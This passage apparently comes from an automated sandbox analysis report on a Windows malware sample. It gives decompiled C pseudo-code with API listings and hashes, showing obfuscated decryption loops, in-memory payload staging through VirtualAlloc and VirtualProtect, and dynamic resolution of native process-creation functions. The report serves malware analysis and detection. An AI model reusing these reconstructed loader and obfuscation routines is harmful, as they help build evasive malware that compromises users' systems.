        									} else {
        										goto L24;
        									}
        								}
        							}
        						}
        					}
        				}
        				L47:
        				return _t40;
        			}

        APIs
        • GetModuleHandleW.KERNEL32(00000000,?,?,00000000), ref: 00406573
        • GetModuleHandleW.KERNEL32(?,LoadLibraryA,GetProcAddress,?,?,00000000), ref: 00406649
        • GetProcAddress.KERNEL32(00000000,NtCreateThread), ref: 00406668
        • GetProcAddress.KERNEL32(NtCreateUserProcess), ref: 0040667A
        • GetProcAddress.KERNEL32(NtQueryInformationProcess), ref: 0040668C
        • GetProcAddress.KERNEL32(RtlUserThreadStart), ref: 0040669E
        • GetProcAddress.KERNEL32(LdrLoadDll), ref: 004066B0
        • GetProcAddress.KERNEL32(LdrGetDllHandle), ref: 004066C2
        • HeapCreate.KERNELBASE(00000000,00080000,00000000,?,?,00000000), ref: 004066FB
        • GetProcessHeap.KERNEL32(?,?,00000000), ref: 0040670A
        • InitializeCriticalSection.KERNEL32(0041EC44,?,?,00000000), ref: 00406737
        • WSAStartup.WS2_32(00000202,?), ref: 0040674D
        • CreateEventW.KERNEL32(0041E5C8,00000001,00000000,00000000,?,?,00000000), ref: 0040676E
        • GetLengthSid.ADVAPI32(00000000,000000FF,0041E5A0,?,?,00000000), ref: 004067A3
        • GetCurrentProcessId.KERNEL32(00000000,00000000,00000000,?,?,00000000), ref: 004067D0
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp
        Similarity
        • API ID: AddressProc$CreateHandleHeapModuleProcess$CriticalCurrentEventInitializeLengthSectionStartup
        • String ID: @xw$GetProcAddress$LdrGetDllHandle$LdrLoadDll$LoadLibraryA$NtCreateThread$NtCreateUserProcess$NtQueryInformationProcess$RtlUserThreadStart
        • API String ID: 3091071419-944592941
        • Opcode ID: 927afc28ef76845d889ec38140c415208f96e1c7a24ef69a3a5f997d95d714da
        • Instruction ID: dbef48206a881c020043ad3c6f659b1526b61a3eac7e92badc8f7e4f9cea0ad4
        • Opcode Fuzzy Hash: 927afc28ef76845d889ec38140c415208f96e1c7a24ef69a3a5f997d95d714da
        • Instruction Fuzzy Hash: 6691D175901341EFCB10EFA6DC8469A7BA5BF04308B11883FE946B32A1E7398855CF5E
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 71%
        			E02457E13(signed int _a4) {
        				void* _v36;
        				char _v64;
        				char _v68;
        				long _v72;
        				signed int _v76;
        				char _v80;
        				char _v84;
        				char _v88;
        				signed int _v92;
        				char _v96;
        				void* _v103;
        				char _v104;
        				intOrPtr _v108;
        				intOrPtr _v112;
        				intOrPtr _v116;
        				intOrPtr _v120;
        				void* _v123;
        				char _v124;
        				intOrPtr _v128;
        				intOrPtr _v132;
        				char _v136;
        				signed int _v140;
        				signed int _v144;
        				intOrPtr _v148;
        				intOrPtr _v152;
        				intOrPtr _v156;
        				intOrPtr _v160;
        				char _v164;
        				intOrPtr _v168;
        				intOrPtr _v172;
        				char _v176;
        				intOrPtr _v180;
        				intOrPtr _v184;
        				short _v188;
        				intOrPtr _v192;
        				intOrPtr _v196;
        				intOrPtr _v200;
        				char _v204;
        				signed int _v208;
        				signed int _v212;
        				char _v216;
        				signed int _v220;
        				void* _v224;
        				char _v228;
        				signed int _v232;
        				signed int _v236;
        				signed int _v240;
        				char _v244;
        				signed int _v248;
        				signed int* _v252;
        				signed int _v256;
        				signed int _v260;
        				void* _v264;
        				signed int _v268;
        				intOrPtr _v272;
        				signed int _v276;
        				intOrPtr _v280;
        				signed int _v284;
        				intOrPtr _v288;
        				signed int _v292;
        				void* __ebx;
        				void* __edi;
        				void* __esi;
        				signed int _t384;
        				char _t385;
        				void* _t396;
        				void* _t415;
        				void* _t420;
        				signed int _t429;
        				intOrPtr _t449;
        				void* _t465;
        				void* _t466;
        				signed int _t499;
        				void* _t525;
        				signed int _t574;
        				char _t591;
        				char _t592;
        				signed int _t614;
        				void* _t630;
        				signed int _t631;
        				signed int _t682;
        				void* _t700;
        				signed int _t719;
        				intOrPtr _t730;
        				signed int _t752;
        				long _t753;
        				signed int _t755;
        				void* _t756;
        				void* _t770;
        				signed int _t789;
        				void* _t791;
        
        				_t791 = (_t789 & 0xfffffff8) - 0x104;
        				_v256 = 0xc6f8e435;
        				_v248 = 0xc6f8e434;
        				_v260 = _a4;
        				_t574 = 0x2a823c2b;
        				_v252 = (_v256 ^ 0x2a823c2b) + 0x138527e2;
        				_v244 = (_v256 ^ 0x2a823c2b) + 0x138527e2;
        				_v232 = (_v256 ^ 0x2a823c2b) + 0x138527e2;
        				_v88 = (_v256 ^ 0x2a823c2b) + 0x138527e2;
        				_v208 = 0xc6f96435;
        				_v232 = 0xc6f8d435;
        				_v144 = 0xc6f8e409;
        				_t591 = 0x26;
        				_v228 = _t591;
        				_v228 = _t591;
        				_t592 = 0x66;
        				_v228 = _t592;
        				_v228 = _t592;
        				_v228 = 0x4e;
        				_v228 = 0x44;
        				_v228 = (_v256 ^ 0x2a823c2b) + 0x138527e2;
        				_v228 = (_v256 ^ 0x2a823c2b) + 0x138527e2;
        				_v216 = 0x258;
        				do {
        					_v220 = 0x36;
        					do {
        						_v224 = 0x7a;
        						do {
        							E024588DA( &_v68);
        							_t31 =  &_v224;
        							 *_t31 = _v224 - 1;
        						} while ( *_t31 != 0);
        						_t33 =  &_v220;
        						 *_t33 = _v220 - 1;
        					} while ( *_t33 != 0);
        					_t35 =  &_v216;
        					 *_t35 = _v216 - 1;
        				} while ( *_t35 != 0);
        				_v220 = 0x400e;
        				_t770 = 0x138527e2;
        				_v216 = (_v256 ^ _t574) + 0x138527e2;
        				_v140 = _v140 & 0x00000000;
        				_v224 = (_v256 ^ _t574) + 0x138527e2;
        				_t384 =  *[fs:0x18];
        				_v140 = _t384;
        				_t385 =  *((intOrPtr*)(_t384 + 0x30));
        				_v80 = _t385;
        				_v84 =  *((intOrPtr*)(_t385 + 0xc));
        				 *((intOrPtr*)(_v260 + 0x1a0)) =  &_v140;
        				 *((intOrPtr*)(_v260 + 0x1a4)) =  &_v80;
        				 *((intOrPtr*)(_v260 + 0x1a8)) =  &_v84;
        				if((_v260 ^ _t574) + 0x138527e2 == E0245A87F( &_v84, _v260)) {
        					L27:
        					if((_v256 ^ _t574) + _t770 == _v252 || (_v256 ^ _t574) + _t770 == _v244) {
        						L61:
        						_t396 = (_v256 ^ _t574) + _t770;
        						if(_t396 != _v252) {
        							_t396 =  *((intOrPtr*)( *((intOrPtr*)(_v260 + 0x1d4)) + 0x18))(_v252, (_v256 ^ _t574) + _t770, (_v208 ^ _t574) + _t770);
        						}
        						goto L63;
        					} else {
        						_t752 = (_v256 ^ _t574) + _t770;
        						while(_t752 < _v244) {
        							_v228 = _v252 + _t752;
        							_t614 = 0x2c;
        							_t729 = _t752 % _t614;
        							 *_v228 =  *_v228 + 0xcb;
        							_t752 = _t752 + (_v248 ^ _t574) + 0x138527e2;
        						}
        						_t753 = E0245B598(_v244, _v252);
        						_t415 = VirtualAlloc((_v256 ^ _t574) + _t770, _t753, (_v232 ^ _t574) + _t770, (_v144 ^ _t574) + _t770);
        						_v232 = _t415;
        						if((_v256 ^ _t574) + _t770 == _t415) {
        							L46:
        							_t630 = 0;
        							if(_v244 == 0) {
        								L48:
        								_v224 = _v252;
        								_t631 = _v256;
        								_t420 = (_v248 ^ _t574) + _t770;
        								_v204 = 0x2d161e16;
        								_v200 = 0x23162b16;
        								while(_t631 != 0xc6f8e40d) {
        									_t730 = _v224;
        									_t755 = _t631 ^ _t574;
        									_t729 =  *((char*)(_t755 + _t730 + 0x138527e2));
        									if( *((char*)(_t755 + _t730 + 0x138527e2)) != (( *(_t791 + _t755 + 0x1385282a) ^ 0x0000003f) + 0x0000002f & 0x000000ff)) {
        										_t420 = (_v256 ^ _t574) + _t770;
        										L54:
        										if((_v256 ^ _t574) + _t770 == _t420) {
        											L60:
        											_t429 = E02459A29(_v252, _v244,  *((intOrPtr*)( *((intOrPtr*)(_v260 + 0x1c0)))),  *((intOrPtr*)( *((intOrPtr*)(_v260 + 0x1c4)))),  &_v88,  *((intOrPtr*)(_v260 + 0x1cc)), _v260); // executed
        											_v260 = _t429;
        											goto L61;
        										}
        										_v248 = 0xc6f8e435;
        										_v232 = 0xc6f92aa6;
        										_v212 = 0xc6f8d435;
        										_v236 = 0xc6f8e409;
        										_v220 =  *((intOrPtr*)(_v224 + 8));
        										_t756 = VirtualAlloc((_v248 ^ _t574) + _t770, (_v232 ^ _t574) + _t770, (_v212 ^ _t574) + _t770, (_v236 ^ _t574) + _t770);
        										_t396 = VirtualAlloc((_v248 ^ _t574) + _t770, _v220, (_v212 ^ _t574) + _t770, (_v236 ^ _t574) + _t770);
        										_v236 = _t396;
        										if((_v248 ^ _t574) + _t770 == _t756 || (_v248 ^ _t574) + _t770 == _t396) {
        											L63:
        											return _t396;
        										} else {
        											_v232 = 0xc6f8e40a;
        											_v144 = 0xc6f8e40b;
        											 *_t756 = (_v232 ^ 0x0000002b) - 0x1e;
        											 *((char*)(_t756 + 1)) = (_v248 ^ 0x0000002b) - 0x1e;
        											 *((char*)(_t756 + 2)) = (_v144 ^ 0x0000002b) - 0x1e;
        											_v92 = _v92 & 0x00000000;
        											_v76 = _v76 & 0x00000000;
        											_push( &_v76);
        											_push(_v220);
        											_push(_t396);
        											_v260 = E02458B27(_t729, _t756,  &(_v252[4]),  *((intOrPtr*)(_v224 + 0xc)),  &_v92);
        											VirtualFree(_t756, (_v276 ^ _t574) + _t770, (_v236 ^ _t574) + _t770);
        											_t449 =  *((intOrPtr*)(_v288 + 0x1d4));
        											_t682 = _v236;
        											if((_v260 + 0xec7ad81e ^ _t574) != 0xc6f8e435) {
        												 *((intOrPtr*)(_t449 + 0x18))(_v248, (_v260 ^ _t574) + _t770, (_t682 ^ _t574) + _t770);
        											} else {
        												VirtualFree(_v264, (_v260 ^ _t574) + _t770, (_t682 ^ _t574) + _t770);
        												_v264 = _v248;
        												_v256 = _v232;
        											}
        											goto L60;
        										}
        									}
        									_t631 = (_v248 ^ _t574) + _t755 + 0x138527e2 ^ _t574;
        								}
        								goto L54;
        							} else {
        								goto L47;
        							}
        							do {
        								L47:
        								_t729 = _v252;
        								 *(_v252 + _t630) = ( *(_v252 + _t630) ^ 0x0000003f) + 0x2f;
        								_t630 = _t630 + 1;
        							} while (_t630 < _v244);
        							goto L48;
        						}
        						E0245B440(_v252, _v244, _t415, _t753);
        						VirtualFree(_v264, (_v268 ^ 0x2a823c2b) + 0x138527e2, (_v220 ^ 0x2a823c2b) + 0x138527e2);
        						_v264 = _v244;
        						_v256 = _t753;
        						_t729 = 0;
        						if(_v256 == 0) {
        							L45:
        							_t770 = 0x138527e2;
        							_t574 = 0x2a823c2b;
        							goto L46;
        						} else {
        							goto L34;
        						}
        						do {
        							L34:
        							_v240 = _v240 & 0x00000000;
        							while(1) {
        								_t465 = 0x10;
        								if(_v244 - _v240 - _t729 <= _t465) {
        									_t465 = _v244 - _v240 - _t729;
        								}
        								if(_v240 >= _t465) {
        									break;
        								}
        								_t729 = (_t729 >> 0x00000004 & 0x00000003) * (_t729 + _v240 & 0x0000001f) * (_t729 + _v240 & 0x00000003) >> 0x20;
        								 *((intOrPtr*)(_v252 + _v240 + _t729)) =  *((intOrPtr*)(_v252 + _v240 + _t729)) + 0xfe;
        								_v240 = _v240 + 1;
        							}
        							_t700 = 0;
        							while(1) {
        								_t466 = 8;
        								if(_v244 - _t700 - _t729 <= _t466) {
        									_t466 = _v244 - _t700 - _t729;
        								}
        								if(_t700 >= _t466) {
        									goto L44;
        								}
        								 *((intOrPtr*)(_v252 + _t700 + _t729)) =  *((intOrPtr*)(_v252 + _t700 + _t729)) - _t700;
        								_t700 = _t700 + 1;
        							}
        							L44:
        							_t729 = _t729 + 0x40;
        						} while (_t729 < _v244);
        						goto L45;
        					}
        				}
        				VirtualProtect( *((intOrPtr*)( *((intOrPtr*)(_v260 + 0x18c)))) +  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v260 + 0x194)))) +  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v260 + 0x194)))) + 0x3c)) + 0x88)),  *( *((intOrPtr*)( *((intOrPtr*)(_v260 + 0x194)))) +  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v260 + 0x194)))) + 0x3c)) + 0x8c), 4,  &_v72);
        				_v136 = 0x62b7b25;
        				_v132 = 0x7f227c0d;
        				_v128 = 0x2d7c0977;
        				_v124 = 0xee;
        				asm("stosd");
        				asm("stosw");
        				asm("stosb");
        				_v116 = 0x62b7b25;
        				_v112 = 0x7f227c0d;
        				_v108 = 0x177c0977;
        				_v104 = 0xee;
        				asm("stosd");
        				asm("stosw");
        				asm("stosb");
        				_t729 =  *(_v260 + 0x1b8);
        				_v196 = 0x7c7a7b02;
        				_v192 = 0x57e010b;
        				_v188 = 0xee2d;
        				_v184 = 0x62b7b25;
        				_v180 = 0x22d7c0d;
        				_v176 = 0x200d067e;
        				_v172 = 0x7c090179;
        				_v168 = 0xee2d0b05;
        				_v164 = 0x62b7b25;
        				_v160 = 0x22d7c0d;
        				_v156 = 0x200d067e;
        				_v152 = 0x7c090179;
        				_v148 = 0xee170b05;
        				if(E0245A54F( *((intOrPtr*)( *((intOrPtr*)(_v260 + 0x1a8)))), E0245A8AE( *(_v260 + 0x1b8), _v260), _v260) == 0) {
        					_v236 =  *((intOrPtr*)(_v260 + 0x1d4)) + 4;
        					_t729 =  *(_v260 + 0x1b8);
        					_push(E0245A8AE( *(_v260 + 0x1b8), _v260));
        					if( *_v236() == 0) {
        						_v240 =  *((intOrPtr*)(_v264 + 0x1d4)) + 0x10;
        						_t729 =  *(_v264 + 0x1b8);
        						 *_v240(E0245A8AE( *(_v264 + 0x1b8), _v264));
        					}
        				}
        				if((_v256 ^ _t574) + _t770 == _v220 || _v216 > 0xec7ad81e - (_v248 ^ _t574) + _v220) {
        					L24:
        					if(_v216 != _v224) {
        						 *_v252 =  *_v252 ^ (_v248 ^ _t574) + _t770;
        					} else {
        						_t499 = E0245B3D9( &_v244, _v260); // executed
        						_v260 = _t499;
        					}
        					goto L27;
        				} else {
        					do {
        						_v236 = 0;
        						 *((intOrPtr*)( *((intOrPtr*)(_v272 + 0x19c)))) = E0245A54F( *((intOrPtr*)( *((intOrPtr*)(_v260 + 0x1a8)))), E0245A8AE( *((intOrPtr*)(_v260 + 0x1b4)), _v260), _v260);
        						_v116 =  *((intOrPtr*)( *((intOrPtr*)(_v272 + 0x1d4)) + 8))( *((intOrPtr*)( *((intOrPtr*)(_v272 + 0x19c)))), E0245A8E4(0,  &_v176, _v272));
        						 *((intOrPtr*)( *((intOrPtr*)(_v280 + 0x1d4)) + 8))( *((intOrPtr*)( *((intOrPtr*)(_v280 + 0x19c)))), E0245A8E4(0,  &_v204, _v280));
        						_t525 =  *((intOrPtr*)( *((intOrPtr*)(_v288 + 0x1d4)) + 8))( *((intOrPtr*)( *((intOrPtr*)(_v288 + 0x19c)))), E0245A8E4(0,  &_v164, _v288));
        						_v276 = _v276 & 0x00000000;
        						_v264 = _t525;
        						do {
        							_push((_v264 & 0x00000007) + 0x31);
        							if(_v120() == 0) {
        								L16:
        								_v240 = _v240 & 0x00000000;
        								goto L17;
        							}
        							_t719 = 0x19;
        							_push(_v268 % _t719 + 0x00000041 & 0x000000ff); // executed
        							if(_v256() != 0) {
        								goto L16;
        							}
        							_v252 =  *((intOrPtr*)( *((intOrPtr*)(_v292 + 0x1d4)) + 8))( *((intOrPtr*)( *((intOrPtr*)(_v292 + 0x198)))), E0245A8E4(0,  &_v228, _v292));
        							L17:
        							_v268 = _v268 + 1;
        						} while (_v268 < 0x10);
        						_push(E0245A8E4((_v276 ^ _t574) + 0x138527e2,  &_v96, _v288));
        						_t729 =  &_v64;
        						_push(E0245A8E4((_v284 ^ _t574) + 0x138527e2,  &_v64, _v288)); // executed
        						if((_v292 ^ _t574) + 0x138527e2 == _v240()) {
        							_v272 = 1;
        						}
        						_v252 = (_v284 ^ _t574) + _v252 + 0x138527e2;
        						if(_v272 != 0) {
        							_v260 = (_v284 ^ _t574) + _v260 + 0x138527e2;
        						}
        					} while (_v252 <= 0xec7ad81e - (_v284 ^ _t574) + _v256);
        					_t770 = 0x138527e2;
        					goto L24;
        				}
        			}

        APIs
        • VirtualProtect.KERNELBASE(?,?,00000004,?,?), ref: 02457FEE
        • VirtualAlloc.KERNELBASE(C6F8E434,00000000,00000044,C6F8E409,?), ref: 0245842A
        • VirtualFree.KERNELBASE(?,?,C6F96435,?,00000000,00000000), ref: 0245847A
        • VirtualAlloc.KERNELBASE(C6F8E409,00000000,C6F96435,C6F8E409), ref: 02458626
        • VirtualAlloc.KERNELBASE(?,C6F8D435,C6F96435,C6F8E409), ref: 02458654
        • VirtualFree.KERNELBASE(00000000,?,C6F96435,00000000,C6F8E3FA,?,?,00000000,00000000,00000000), ref: 02458712
        • VirtualFree.KERNELBASE(?,?,C6F96435), ref: 02458747
          • Part of subcall function 02459A29: VirtualProtect.KERNELBASE(C6F90E40,?,C6F8E475,?,C6F8E435,138527E2,2A823C2B), ref: 02459B5F
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.200005874.0000000002449000.00000040.00000001.sdmp, Offset: 02440000, based on PE: true
        • Associated: 00000001.00000002.199998558.0000000002440000.00000040.00000001.sdmp
        Similarity
        • API ID: Virtual$AllocFree$Protect
        • String ID: -$6$D$w|-$z
        • API String ID: 1189896503-3252895305
        • Opcode ID: 83e5532f2af3301e27c59f772f91f7027ff3e2d4392f4593e375364c6920ae0a
        • Instruction ID: 43cf0a844ca9eea4ead5bb2f73a3a2c4e9d574981e0869c2df5db53a3cfee520
        • Opcode Fuzzy Hash: 83e5532f2af3301e27c59f772f91f7027ff3e2d4392f4593e375364c6920ae0a
        • Instruction Fuzzy Hash: 725206752083519FC714CF28C894AABBBE1FF88714F45496EF88A9B351DB34E849CB52
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 61%
        			E024590B3(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, char _a16, intOrPtr _a20, signed int _a24) {
        				intOrPtr _v0;
        				signed int _v8;
        				signed int _v12;
        				char _v15;
        				char _v16;
        				char _v17;
        				char _v18;
        				char _v19;
        				char _v20;
        				char _v22;
        				char _v23;
        				char _v24;
        				char _v25;
        				char _v26;
        				char _v27;
        				char _v28;
        				char _v29;
        				char _v30;
        				char _v31;
        				char _v32;
        				char _v33;
        				char _v34;
        				char _v35;
        				char _v36;
        				intOrPtr _v40;
        				void* _v44;
        				short _v46;
        				short _v48;
        				short _v50;
        				short _v52;
        				short _v54;
        				short _v56;
        				short _v58;
        				char _v60;
        				short _v64;
        				short _v66;
        				short _v68;
        				short _v70;
        				short _v72;
        				short _v74;
        				short _v76;
        				short _v78;
        				short _v80;
        				short _v84;
        				short _v86;
        				short _v88;
        				short _v90;
        				short _v92;
        				short _v94;
        				short _v96;
        				short _v98;
        				short _v100;
        				char _v104;
        				intOrPtr* _v108;
        				void* _t146;
        				void* _t149;
        				void* _t152;
        				void* _t162;
        				intOrPtr _t171;
        				intOrPtr _t173;
        				signed int* _t191;
        				signed int _t220;
        				char _t223;
        				void* _t291;
        
        				_v8 = 0xc6f8e435;
        				_v12 = 0xc6f8e434;
        				_v20 = 7;
        				_v19 = 0xa;
        				_v18 = 5;
        				_v17 = 0x3b;
        				_v16 = 0x3c;
        				_v15 = 0xee;
        				_v28 = 0x79;
        				_v27 = 0x7b;
        				_t223 = 9;
        				_v26 = _t223;
        				_v25 = 0x7c;
        				_v24 = 0x3b;
        				_v23 = 0x3c;
        				_v22 = 0xee;
        				_v36 = 0x7b;
        				_v35 = 6;
        				_v34 = 2;
        				_v33 = 0x77;
        				_v32 = 0xd;
        				_v31 = 0x7e;
        				_v30 = 5;
        				_v29 = 0xee;
        				_t146 = (_v8 ^ 0x2a823c2b) + 0x138527e2;
        				while(_t146 < 6) {
        					 *(_t291 + _t146 - 0x10) = ( *(_t291 + _t146 - 0x10) & 0x000000ff ^ 0x0000003f) + 0x2f;
        					_t146 = _t146 + (_v12 ^ 0x2a823c2b) + 0x138527e2;
        				}
        				_t149 = (_v8 ^ 0x2a823c2b) + 0x138527e2;
        				while(_t149 < 7) {
        					 *(_t291 + _t149 - 0x18) = ( *(_t291 + _t149 - 0x18) & 0x000000ff ^ 0x0000003f) + 0x2f;
        					_t149 = _t149 + (_v12 ^ 0x2a823c2b) + 0x138527e2;
        				}
        				_t152 = (_v8 ^ 0x2a823c2b) + 0x138527e2;
        				while(_t152 < 8) {
        					 *(_t291 + _t152 - 0x20) = ( *(_t291 + _t152 - 0x20) & 0x000000ff ^ 0x0000003f) + 0x2f;
        					_t152 = _t152 + (_v12 ^ 0x2a823c2b) + 0x138527e2;
        				}
        				_v108 =  &_v104;
        				 *_v108 = 0x4872035f;
        				if( *((intOrPtr*)( *((intOrPtr*)(_a24 + 0x18c)))) == (_v8 ^ 0x2a823c2b) + 0x138527e2) {
        					 *((intOrPtr*)( *((intOrPtr*)(_a24 + 0x17c)))) = (_v8 ^ 0x2a823c2b) + 0x138527e2;
        					 *((intOrPtr*)( *((intOrPtr*)(_a24 + 0x180)))) = (_v8 ^ 0x2a823c2b) + 0x138527e2;
        					_v60 = 0xe1c4;
        					_v58 = 0xe1d1;
        					_v56 = 0xe1dd;
        					_v54 = 0xe1c0;
        					_v52 = 0xe1d6;
        					_v50 = 0xe1d9;
        					_v48 = 0xe1de;
        					_v46 = 0xe049;
        					asm("stosw");
        					_t191 =  &_v60;
        					do {
        						 *_t191 = (0x000020b6 ^  *_t191) + 0x3f01;
        						_t191 =  &(_t191[0]);
        						_t223 = _t223 - 1;
        					} while (_t223 != 0);
        					_push( &_v60);
        					_push(1);
        					_push((_v12 ^ 0x2a823c2b) + 0x138527e2);
        					_push(_a24 + 0x88);
        					_push( *((intOrPtr*)( *((intOrPtr*)(_a24 + 0x198)))));
        					if( *_a4() == (_v8 ^ 0x2a823c2b) + 0x138527e2) {
        						_t220 =  *0xa4d725e | 0x3b73725f;
        						 *0xa4d725e = _t220;
        						 *0xa4d725e = _t220 + 0xa5310bf;
        					}
        					_v100 = 0xe1e1;
        					_v98 = 0xe1e1;
        					_v96 = 0xe1d2;
        					_v94 = 0xe1da;
        					_v92 = 0xe1d8;
        					_v90 = 0xe1c7;
        					_v88 = 0xe1ce;
        					_v86 = 0xe1e1;
        					_v84 = 0xe049;
        					_v80 = 0xe1c1;
        					_v78 = 0xe1fa;
        					_v76 = 0xe1f2;
        					_v74 = 0xe1fa;
        					_v72 = 0xe1f8;
        					_v70 = 0xe1e7;
        					_v68 = 0xe1ee;
        					_v66 = 0xe1c1;
        					_v64 = 0xe049;
        					 *(_t291 + 0x270a4f78 + (_v8 ^ 0x2a823c2b) * 2) = (_v8 ^ 0x2a823c2b) + 0x138527e2 ^  *(_t291 + 0x270a4f78 + (_v8 ^ 0x2a823c2b) * 2) & 0x0000ffff;
        					 *(_t291 + 0x270a4f64 + (_v8 ^ 0x2a823c2b) * 2) = (_v8 ^ 0x2a823c2b) + 0x138527e2 ^  *(_t291 + 0x270a4f64 + (_v8 ^ 0x2a823c2b) * 2) & 0x0000ffff;
        					 *((short*)(_t291 + 0x270a4f48 + (_v8 ^ 0x2a823c2b) * 2)) = (_v8 ^ 0x2a823c2b) + 0x138527e2;
        					 *((short*)(_t291 + 0x270a4f34 + (_v8 ^ 0x2a823c2b) * 2)) = (_v8 ^ 0x2a823c2b) + 0x138527e2;
        				}
        				_t120 =  &_a16; // 0x3b
        				_v40 = E02458F6C(_v12, _v8, _a4, _a8, _a12,  *_t120, _a20, _a24);
        				_t162 = (_v8 ^ 0x2a823c2b) + 0x138527e2;
        				if(_t162 != _v40) {
        					_a24 = _v40 + _a24;
        					E02457E13(_a24); // executed
        					_t171 = _a24;
        					if((_v8 ^ 0x2a823c2b) + 0x138527e2 != ( *( *(_a24 + 0x1c8)) ^ 0x2a823c2b) + 0x138527e2) {
        						_t173 =  *((intOrPtr*)( *((intOrPtr*)(_t171 + 0x17c))));
        						_v0 = _v0 + _t173;
        						return _t173;
        					}
        					return  *((intOrPtr*)( *((intOrPtr*)(_t171 + 0x1d4)) + 0x28))( *((intOrPtr*)( *((intOrPtr*)(_a24 + 0x1cc)))));
        				}
        				return _t162;
        			}

        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.200005874.0000000002449000.00000040.00000001.sdmp, Offset: 02440000, based on PE: true
        • Associated: 00000001.00000002.199998558.0000000002440000.00000040.00000001.sdmp
        Similarity
        • API ID:
        • String ID: ;$;$;<$<$<$w$y${${$|$~
        • API String ID: 0-3985088450
        • Opcode ID: 878cdaf6ec9676d7fdd5c4180dbd33a61277ee012233e65cbb43da13221c47ce
        • Instruction ID: 57c83e2feec7b4cf614c240a423b19929aeaf1cd43b2e3607b87c03684741bdf
        • Opcode Fuzzy Hash: 878cdaf6ec9676d7fdd5c4180dbd33a61277ee012233e65cbb43da13221c47ce
        • Instruction Fuzzy Hash: FAC18F35A04299DFCB01CFA8C880ADEBBF2FF59304F1541A9E845EB351E3749A46CB95
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 79%
        			E004145CF(struct _SECURITY_DESCRIPTOR* __edi, intOrPtr* __esi) {
        				signed int _v8;
        				struct _ACL* _v12;
        				int _v16;
        				int _v20;
        				void** _t19;
        				struct _SECURITY_DESCRIPTOR* _t28;
        				intOrPtr* _t29;
        
        				_t29 = __esi;
        				_t28 = __edi;
        				if(InitializeSecurityDescriptor(__edi, 1) == 0 || SetSecurityDescriptorDacl(__edi, 1, 0, 0) == 0) {
        					return 0;
        				} else {
        					_t19 =  &_v8;
        					__imp__ConvertStringSecurityDescriptorToSecurityDescriptorW(L"S:(ML;;NRNWNX;;;LW)", 1, _t19, 0); // executed
        					if(_t19 == 0) {
        						L6:
        						_v8 = _v8 | 0xffffffff;
        						L7:
        						if(_t29 != 0) {
        							 *_t29 = 0xc;
        							 *(_t29 + 4) = _t28;
        							 *((intOrPtr*)(_t29 + 8)) = 0;
        						}
        						return _v8;
        					}
        					_v12 = 0;
        					if(GetSecurityDescriptorSacl(_v8,  &_v20,  &_v12,  &_v16) == 0 || SetSecurityDescriptorSacl(__edi, _v20, _v12, _v16) == 0) {
        						LocalFree(_v8);
        						goto L6;
        					} else {
        						goto L7;
        					}
        				}
        			}

        APIs
        • InitializeSecurityDescriptor.ADVAPI32(0041E5D4,00000001,00000000,0040675B,?,?,00000000), ref: 004145D9
        • SetSecurityDescriptorDacl.ADVAPI32(0041E5D4,00000001,00000000,00000000,?,?,00000000), ref: 004145EA
        • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,00000000,00000000), ref: 00414600
        • GetSecurityDescriptorSacl.ADVAPI32(00000000,?,?,?,?,?,00000000), ref: 0041461C
        • SetSecurityDescriptorSacl.ADVAPI32(0041E5D4,?,?,?,?,?,00000000), ref: 00414630
        • LocalFree.KERNEL32(00000000,?,?,00000000), ref: 0041463D
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp
        Similarity
        • API ID: DescriptorSecurity$Sacl$ConvertDaclFreeInitializeLocalString
        • String ID: S:(ML;;NRNWNX;;;LW)
        • API String ID: 2050860296-820036962
        • Opcode ID: b9f79daed3d91f1ad3a37bcf5a237df9df8b5f24ed669165a711afda18e23400
        • Instruction ID: d924ea726a96619232ec9c363ed6bbfca91e7a831330dbab6d813b4f3391ee15
        • Opcode Fuzzy Hash: b9f79daed3d91f1ad3a37bcf5a237df9df8b5f24ed669165a711afda18e23400
        • Instruction Fuzzy Hash: 80112E71A00249BFEF219FE0CD84AEFBBBCAB41744F10416AF651F11A0D7799A809B18
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 92%
        			E02459A29(signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, signed int* _a20, intOrPtr* _a24, signed int _a28) {
        				signed int _v8;
        				intOrPtr _v12;
        				signed int _v16;
        				signed int _v20;
        				void* _v24;
        				long _v28;
        				signed int _v32;
        				signed int _v36;
        				signed int _v40;
        				intOrPtr _v44;
        				signed int _v48;
        				intOrPtr _v52;
        				intOrPtr _v56;
        				intOrPtr _v60;
        				intOrPtr* _v64;
        				intOrPtr* _v68;
        				intOrPtr _v72;
        				intOrPtr _v76;
        				intOrPtr _v80;
        				intOrPtr _v84;
        				intOrPtr _v88;
        				intOrPtr _v92;
        				intOrPtr _v96;
        				intOrPtr _v100;
        				intOrPtr _v104;
        				intOrPtr _v108;
        				intOrPtr _v112;
        				intOrPtr _v116;
        				intOrPtr _v120;
        				intOrPtr _v124;
        				intOrPtr _v128;
        				intOrPtr _v132;
        				intOrPtr _v136;
        				intOrPtr _v140;
        				intOrPtr _v144;
        				intOrPtr _v148;
        				intOrPtr _v152;
        				intOrPtr _v156;
        				intOrPtr _v160;
        				intOrPtr _v164;
        				intOrPtr _v168;
        				intOrPtr _v172;
        				intOrPtr _v176;
        				intOrPtr _v180;
        				intOrPtr _v184;
        				char _v196;
        				char _v220;
        				intOrPtr _t262;
        				intOrPtr _t275;
        				void* _t276;
        				intOrPtr _t290;
        				signed int _t301;
        				void* _t303;
        				intOrPtr* _t312;
        				intOrPtr _t319;
        				signed int _t320;
        				signed int* _t322;
        				signed int _t336;
        				intOrPtr _t345;
        				void* _t352;
        				intOrPtr _t360;
